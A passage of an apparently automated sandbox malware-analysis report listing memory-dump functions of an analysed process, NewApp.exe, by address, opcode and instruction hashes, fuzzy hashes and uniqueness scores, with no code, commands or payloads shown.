                                                      • Instruction ID: 0edfaa4bb64df3322675389e9d9df4a66ab89bb2760152e72deaad0172225cc8
                                                      • Opcode Fuzzy Hash: 9d2f0b308477a8398f68b9e957b82a9ad0d71582030c0b6730ffae50c48cf531
                                                      • Instruction Fuzzy Hash: 424146786046099FCB15DF69D889AAA7BF6BF48315F10006AF906CB3B1CB34DD81CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3AC78, Relevance: .1, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf013a2bd0f57f99ced26cd6ba03723b4c4b0cf91e77f9bc89fb01a9948cdbb7
                                                      • Instruction ID: 87114db6a16ac3afe777512f6124a4664f220ecc1f413bf7de83cc067596dc8c
                                                      • Opcode Fuzzy Hash: bf013a2bd0f57f99ced26cd6ba03723b4c4b0cf91e77f9bc89fb01a9948cdbb7
                                                      • Instruction Fuzzy Hash: 0831B230B041148BDB64EBB8D41637EB7F6AB8031AF10896AD4869B7C4EB34DD85C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D32B48, Relevance: .1, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16cc114d7052fa801388fc07533f217b06c68605537ca7dfb42853466e715f58
                                                      • Instruction ID: 598e7226d785baecc0e509e008f7165bad2865a7cbe5e7a633b6e9835edec4f1
                                                      • Opcode Fuzzy Hash: 16cc114d7052fa801388fc07533f217b06c68605537ca7dfb42853466e715f58
                                                      • Instruction Fuzzy Hash: 0331CF36B042499FCB00DF69D885AAEBBB9FF88310F00406BE519D7261C771D901CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D31061, Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd348ef90fac2f4ea27a80038b5cc0b95a9f3a23980704507f665030201fb14d
                                                      • Instruction ID: 69a02bb381cdaf7b75a7fd8037e20c4e944ec7c59b1616fbfc5c41852fe41b54
                                                      • Opcode Fuzzy Hash: bd348ef90fac2f4ea27a80038b5cc0b95a9f3a23980704507f665030201fb14d
                                                      • Instruction Fuzzy Hash: 32210A353015068BDB2416B5E857ABE319BFFC1698F14803AD507CF794EE6ACC42C751
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3DF30, Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 35c8ed383911cc68ad6d01c1e588431c0c2f0951b54418869584a3cfed30087f
                                                      • Instruction ID: c7b8f5a6c92fadeca6947c1af01a070d5406e7f671a14e9dd8bfb1afa971720c
                                                      • Opcode Fuzzy Hash: 35c8ed383911cc68ad6d01c1e588431c0c2f0951b54418869584a3cfed30087f
                                                      • Instruction Fuzzy Hash: A2216035B042558FCB00EBB8C8415ADB7F2FF89264F05449AE545EB354DB749E048FA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3ADD8, Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e2d35c31e4c5f69ed7a1e508f025a70ed0fb4f122e5ac4ff6c03a9b37aa035a
                                                      • Instruction ID: 3add8e5f91bcd7d0eecd08d0e608eaded923ae445dbe6c6bc5886901bad4df1f
                                                      • Opcode Fuzzy Hash: 1e2d35c31e4c5f69ed7a1e508f025a70ed0fb4f122e5ac4ff6c03a9b37aa035a
                                                      • Instruction Fuzzy Hash: D7118E34F002188FCB54EBB9D4955AEB7E6FBC8318B10452AE615DB315DB30AC058B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3C4C0, Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 92325d8cece3689bdd46d2f3159b00554532ae14be226ef0baf5769bd7e789b8
                                                      • Instruction ID: ab9897a980c6305bd326f086c663b8c95c9eda62d2abb1665ab374ccdccc788f
                                                      • Opcode Fuzzy Hash: 92325d8cece3689bdd46d2f3159b00554532ae14be226ef0baf5769bd7e789b8
                                                      • Instruction Fuzzy Hash: 7B118F71B105158F8B80FFBCC8555AE77F6EFC8225750846AD18AE7354EF349D028BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D39348, Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef469581e896780bce2a90710bd370857bc1de03ed63821f161cc49da6c08377
                                                      • Instruction ID: 78d1328463b3aa47267f5d4f76ef9e05327b7bd76a2bcb9c561e42a74a998fc1
                                                      • Opcode Fuzzy Hash: ef469581e896780bce2a90710bd370857bc1de03ed63821f161cc49da6c08377
                                                      • Instruction Fuzzy Hash: 51117F75B105158F8B40EFBCD84559EB7F5EB89214710806AE54AE7348EF34AD02CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3E613, Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d2afd8bb6d1a8850b66a230ac184ef54f0daa0bb46f60f34d645595293c65981
                                                      • Instruction ID: e81e960bcb2f93a167247ba52790dc97aaa849c88f089b2cb9dadc7abd678c9e
                                                      • Opcode Fuzzy Hash: d2afd8bb6d1a8850b66a230ac184ef54f0daa0bb46f60f34d645595293c65981
                                                      • Instruction Fuzzy Hash: CD119471B015148F8B81EFBDD8559DF77F6EB88214B50847AD10AE7344EE349D018BE5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3BE61, Relevance: .1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a0bb4a00ac0a4b72b3c137f61b930f406a7269fdc875b72aa9648e55c5785f4
                                                      • Instruction ID: 0e3bb33b8123d9500ce3674d8e668c1799a367381fd1e0a44d1f0d906dfb4b85
                                                      • Opcode Fuzzy Hash: 0a0bb4a00ac0a4b72b3c137f61b930f406a7269fdc875b72aa9648e55c5785f4
                                                      • Instruction Fuzzy Hash: 81118F71B015158F8B81EF7CC8529AE77F6EFC8218710816AE24AE7354EF349D01CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3AEE7, Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6126fff5b6e57f3e8fcb186d7627606f7e285ebd3d10ad1e1e00702f586577b2
                                                      • Instruction ID: 0cf8a4c13b2071a432075ba111396c7219f32b121a6093ce2f71e76e359cd6a3
                                                      • Opcode Fuzzy Hash: 6126fff5b6e57f3e8fcb186d7627606f7e285ebd3d10ad1e1e00702f586577b2
                                                      • Instruction Fuzzy Hash: 36118231B04105CBCB14EFB8D992AAD73B2FF84308F61446AE1069B395CB75DD058B51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3C4D0, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 633fdd8c1bdde7110b9aaeddc3d19b1b8f3b405ed636d7b734ca1196a27967ca
                                                      • Instruction ID: 88f35485ca5661dd629b1f142fb2f95184328217c5465cd608d6fd47e6ea6e0f
                                                      • Opcode Fuzzy Hash: 633fdd8c1bdde7110b9aaeddc3d19b1b8f3b405ed636d7b734ca1196a27967ca
                                                      • Instruction Fuzzy Hash: 91113071B015198F8B80FB7CD85599E77F6EB88214B50846AD20AE7354EE74AD018BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D32B98, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7adbcdaed984aaf58f1da7efb9037a3863c47ed507232cc52ec9db1e10139c52
                                                      • Instruction ID: a69a41dd6529993277cbe1b15fb17e6cff95207928efa1f12062b662abd2573d
                                                      • Opcode Fuzzy Hash: 7adbcdaed984aaf58f1da7efb9037a3863c47ed507232cc52ec9db1e10139c52
                                                      • Instruction Fuzzy Hash: 09115A75E0021AAFDB10DFA9E855ABEBBF5FF88314F10842AE915E3350D7749A11CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D39358, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 181c0649247264aa889d5b8225f126807aa8728b7344cf1b44ee1b50603388e4
                                                      • Instruction ID: 14d5265bfb63ae488fd11e136acf0c3ac8555587fb61b27858fa1d0ef6a3939f
                                                      • Opcode Fuzzy Hash: 181c0649247264aa889d5b8225f126807aa8728b7344cf1b44ee1b50603388e4
                                                      • Instruction Fuzzy Hash: F9115E75B005148F8B80EF7CD85599E77F6EB88214B00802AE60AE3358EF34AD01CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3BE70, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e5c34a98f4b758f15f642daf26a153f7f392451e5783cab80b45d60187e480d
                                                      • Instruction ID: 8aee3422499a8d00b1403ed446b3aed31d0901d81ea42a66d66e6a90da436045
                                                      • Opcode Fuzzy Hash: 4e5c34a98f4b758f15f642daf26a153f7f392451e5783cab80b45d60187e480d
                                                      • Instruction Fuzzy Hash: 6B113071B015158F8B80FF7DD85199E73F6EFC8214B50806AD20AE7354EE74AD018BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3E620, Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e979792404e835898f95a1e1b724aa5d1221168d5d7f4f0ed20a1d57d80845c
                                                      • Instruction ID: 0485a8967f29e3e5c88d71e30059cb697d649ff199e1bea21b8937fa2ea1ecd4
                                                      • Opcode Fuzzy Hash: 8e979792404e835898f95a1e1b724aa5d1221168d5d7f4f0ed20a1d57d80845c
                                                      • Instruction Fuzzy Hash: 05115E71B015188F8B80EFBDD8519AF77F6EBC8214B50847AD20AE7354EE74AD018BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3ADCB, Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9e1877d59f53b5fd71426f47330cbc2506f51de86b1b977d51caad55857e2fb
                                                      • Instruction ID: deedf9abb8a8571fbcbb1f3d323270acfeae7c3f9da3fb4c2e5de2d0b8686f20
                                                      • Opcode Fuzzy Hash: f9e1877d59f53b5fd71426f47330cbc2506f51de86b1b977d51caad55857e2fb
                                                      • Instruction Fuzzy Hash: 4E11C035B00208CFCB54EFB9C48569AB7F6FB88308B11492AE545EB315EB70AC44CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3AF5F, Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c130d85f4e9e9c5c782bf04898341062a200028d8aac1c3d422f288fa966f956
                                                      • Instruction ID: cfbe969f5e1426deadf586976e0b44fcc3cd441bea4f1b0cae3041b189ba8458
                                                      • Opcode Fuzzy Hash: c130d85f4e9e9c5c782bf04898341062a200028d8aac1c3d422f288fa966f956
                                                      • Instruction Fuzzy Hash: C5115E31B012088BCB54EBF8D5565AD77B2AF85318F10842AD109AB344DF39DD468B51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3D8D2, Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b10d5b78a80ee36b88429532932710847e9f6176f913eff57d5b605fa58ffdf
                                                      • Instruction ID: 169aa401bfa087264937aca5302d0c2df27ed3816d390dc46e0a9f4f5a833799
                                                      • Opcode Fuzzy Hash: 0b10d5b78a80ee36b88429532932710847e9f6176f913eff57d5b605fa58ffdf
                                                      • Instruction Fuzzy Hash: 940136757014148F8B45FB78D8619AE73E3EBC82587148066D24FE7358DF74AD068BB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D393BD, Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5beb346341feafa8bb256289a1cde4a77a90dbd2d6bd2e0c5e5d255d357d084c
                                                      • Instruction ID: beed63ac8d558a20416ea44a2768d3346f2657c8ead98bd9e958ee32ecde709e
                                                      • Opcode Fuzzy Hash: 5beb346341feafa8bb256289a1cde4a77a90dbd2d6bd2e0c5e5d255d357d084c
                                                      • Instruction Fuzzy Hash: 10F08C39B105258F8B44EF78E86649D77E3AB88614B008067E90BE7398EE74DC158BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3BED3, Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 138329af384676c99a0db11dd11c7a87498dc5013afea7265c18bd22b37a87ea
                                                      • Instruction ID: 64bbf7662f6a09fe4e3d03a83a216b2f3df0b247ca5866e8ce22d2832eaa7ca3
                                                      • Opcode Fuzzy Hash: 138329af384676c99a0db11dd11c7a87498dc5013afea7265c18bd22b37a87ea
                                                      • Instruction Fuzzy Hash: 9FF0C231B150154B8B44EB7CE86659D73E2EBC8224B00806BE60EF7394DE749C158BB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3E6E4, Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d0f97e67a24cb7082ce28db94c2d5fe8cab9e61e028c490f0b16d7819cc6b5d5
                                                      • Instruction ID: 02b425aa349f4677893d51d0a931870945bf690a0cb1c428292ffe2b2cc8c56e
                                                      • Opcode Fuzzy Hash: d0f97e67a24cb7082ce28db94c2d5fe8cab9e61e028c490f0b16d7819cc6b5d5
                                                      • Instruction Fuzzy Hash: 51F09021B094144F8B02EB78DCA14DD37F2EB8911874444A3D14AEB390DA249C0687A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D381E8, Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81c28caf3f48b452b983a64981170985657e2609e87f21ea401dfba80f67697a
                                                      • Instruction ID: 93589fe2683d37cfafea44379548c46da600cc727f50f81468c692c1a5a071d8
                                                      • Opcode Fuzzy Hash: 81c28caf3f48b452b983a64981170985657e2609e87f21ea401dfba80f67697a
                                                      • Instruction Fuzzy Hash: DDF082B5E011159F8741DBBCA8051AEBBF5DE9C211B14007BE449E3300EA304A028BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3B475, Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dc386b821333561a0be5f6eb7ae8cedfba4c87813fc6a028a939506aea0140cf
                                                      • Instruction ID: bada6d06ac19c20ec909631a4fc4d10c534b01b2dcd67282b513e09991d4461a
                                                      • Opcode Fuzzy Hash: dc386b821333561a0be5f6eb7ae8cedfba4c87813fc6a028a939506aea0140cf
                                                      • Instruction Fuzzy Hash: 4EF0F971B002088FCB18DBB4D0566AE77B3AF88325F64541AE059FF354EB38ED828751
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D38EB8, Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 72290ab97175954e83340d0003213e94267b82af8e46b5b1893f5b6145fc9790
                                                      • Instruction ID: 7a9d2cd1738a53a546919344fe56ae8b2d9911f092c97d64bf2d8cd8a70f3f8e
                                                      • Opcode Fuzzy Hash: 72290ab97175954e83340d0003213e94267b82af8e46b5b1893f5b6145fc9790
                                                      • Instruction Fuzzy Hash: 71F01271A0124A9FCB51AFB484462AEBBF0EB05226F200A6AD094E2281E7758285DF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D38F68, Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 042ec0378eae13b04f8977b056ac792dfb60e1f3f5481554032f856c2065e98b
                                                      • Instruction ID: 3bc4c9662a7ba49c33f4290e65e31400bd76a837dab47ec14fff09a3e55e8a67
                                                      • Opcode Fuzzy Hash: 042ec0378eae13b04f8977b056ac792dfb60e1f3f5481554032f856c2065e98b
                                                      • Instruction Fuzzy Hash: 3EE092323012514FDB115E6CA8105E977F5DFC6265310456EE880DB345DA24DE858BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D381F8, Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1c6e07e7ee8f50a7ea737a61412f8bdaf072bc4a956e3e3497d2d12daddd699
                                                      • Instruction ID: 5608d3920241edadd39f0e06f91b8af7c4b5d65f9e528ae8503f642628b2f291
                                                      • Opcode Fuzzy Hash: b1c6e07e7ee8f50a7ea737a61412f8bdaf072bc4a956e3e3497d2d12daddd699
                                                      • Instruction Fuzzy Hash: FDE01275E001199F4B40EAADA8055AFBAF9DACC251B004076E51DE3344EA7059018BE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3D913, Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88f92baa06605fc755e75fb9066b8cf502b48edc9a17e9b3ce14d06b7ad512d1
                                                      • Instruction ID: ed932a5840b6ab58c9813b2b3b26272034b0aaa9d4e37191f41d626d63d82b4b
                                                      • Opcode Fuzzy Hash: 88f92baa06605fc755e75fb9066b8cf502b48edc9a17e9b3ce14d06b7ad512d1
                                                      • Instruction Fuzzy Hash: B8E01235B014188B8F45FBB8D8654DD73F2EFC8228B004066D60AF7358DE749C058BB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3C533, Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ed03f10bb91131a6778912a405314e206994e695ca55a12008463c91f697042
                                                      • Instruction ID: 5d9325e0a205678d5c0c7b04c6502a3f1595f9339636639c069130ac07b627a7
                                                      • Opcode Fuzzy Hash: 6ed03f10bb91131a6778912a405314e206994e695ca55a12008463c91f697042
                                                      • Instruction Fuzzy Hash: 24E0ED35B014184B8F45FBB8D8665DD73F2EFC8228B404066D60AF7354DE749C058BB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3E683, Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a0538326aa36aa10972d64e44bfb324e81d006fb898be8fd12bbfddb9be19cf
                                                      • Instruction ID: 710374fb5a32ae2aeddf6b62f2c857983e1b497cc9231cb59f89cabbf2172b17
                                                      • Opcode Fuzzy Hash: 3a0538326aa36aa10972d64e44bfb324e81d006fb898be8fd12bbfddb9be19cf
                                                      • Instruction Fuzzy Hash: 8AE0ED35B054184B8F45FBB8D8664DD73F2EBC8228B508066D60AE7394DE74AC058BB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D38EC8, Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 103734cab133d33601cc991a0fa297f6797735b0f935fda8b5575a34baefe45a
                                                      • Instruction ID: 17fc526ed0866c0d82dca1b77de4e032af8935a00f6f47770d41a258530d0fa1
                                                      • Opcode Fuzzy Hash: 103734cab133d33601cc991a0fa297f6797735b0f935fda8b5575a34baefe45a
                                                      • Instruction Fuzzy Hash: 09E0E5B0D0130ADFCB90EFB9C4462AEBBF1EB08200F20496AD019E2741E7798644DF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3B30A, Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9460f7100dc13d3328d97eb1b169b1a3a491de598d9e30c1c5726773851c3db4
                                                      • Instruction ID: 3dd620586c77fea4d91c32b88c25e5b95660453ede0a3c7140c56a511a097267
                                                      • Opcode Fuzzy Hash: 9460f7100dc13d3328d97eb1b169b1a3a491de598d9e30c1c5726773851c3db4
                                                      • Instruction Fuzzy Hash: 70E0C270B062088FD750DFB8AD836BE7AA29F00B04B20402FE0C6EF142DA30C806C352
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3AC68, Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f5a7623a02e8cb1d061f36e0e4396647a10bca07aaffbb4c0a2912c54cc89cf
                                                      • Instruction ID: 4013a3e2445bf637711204f4064dc7a50d5084227d63d271d14fe5463d7a7876
                                                      • Opcode Fuzzy Hash: 8f5a7623a02e8cb1d061f36e0e4396647a10bca07aaffbb4c0a2912c54cc89cf
                                                      • Instruction Fuzzy Hash: 04D02B2070D2444BC70167B4181D1187B959B02109F4508BFE444CB291D9688C448355
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: NewApp.exe PID: 1504 Parent PID: 1216 NewApp.exeCOMMON

                                                      Executed Functions

                                                      Function 01680438, Relevance: 12.2, Instructions: 12205COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.816427085.0000000001680000.00000040.00000001.sdmp, Offset: 01680000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1ef75253b81a50eb98c95f024ac4f60df4193f75ddb01bcc6395cb576032935
                                                      • Instruction ID: 3ceb2f4164b4cbbef32812468e1d9ab5314df5d4f4b89cdbebc0f45ee31cb0a1
                                                      • Opcode Fuzzy Hash: c1ef75253b81a50eb98c95f024ac4f60df4193f75ddb01bcc6395cb576032935
                                                      • Instruction Fuzzy Hash: 1654EC74A0022D8FDB65DB90C8506EAB7B2FF89304F10C0EAC60A6B764DF355EA59F51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01680448, Relevance: 12.2, Instructions: 12200COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000001F.00000002.816427085.0000000001680000.00000040.00000001.sdmp, Offset: 01680000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81621676fdce8e9e84076bc9ef8f655dea1369adfc36a32e381b3c9982b6b7f8
                                                      • Instruction ID: 5130f7b6b81416ab81a95805e34bd4f8b3595174a563b71e25ae6f6bbd89584d
                                                      • Opcode Fuzzy Hash: 81621676fdce8e9e84076bc9ef8f655dea1369adfc36a32e381b3c9982b6b7f8
                                                      • Instruction Fuzzy Hash: FB54EC74A0022D8FDB65DB90C8506EAB7B2FF89304F10C0EAC60A6B764DF355EA59F51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016E5290, Relevance: 6.3, APIs: 4, Instructions: 257threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 016E53A0
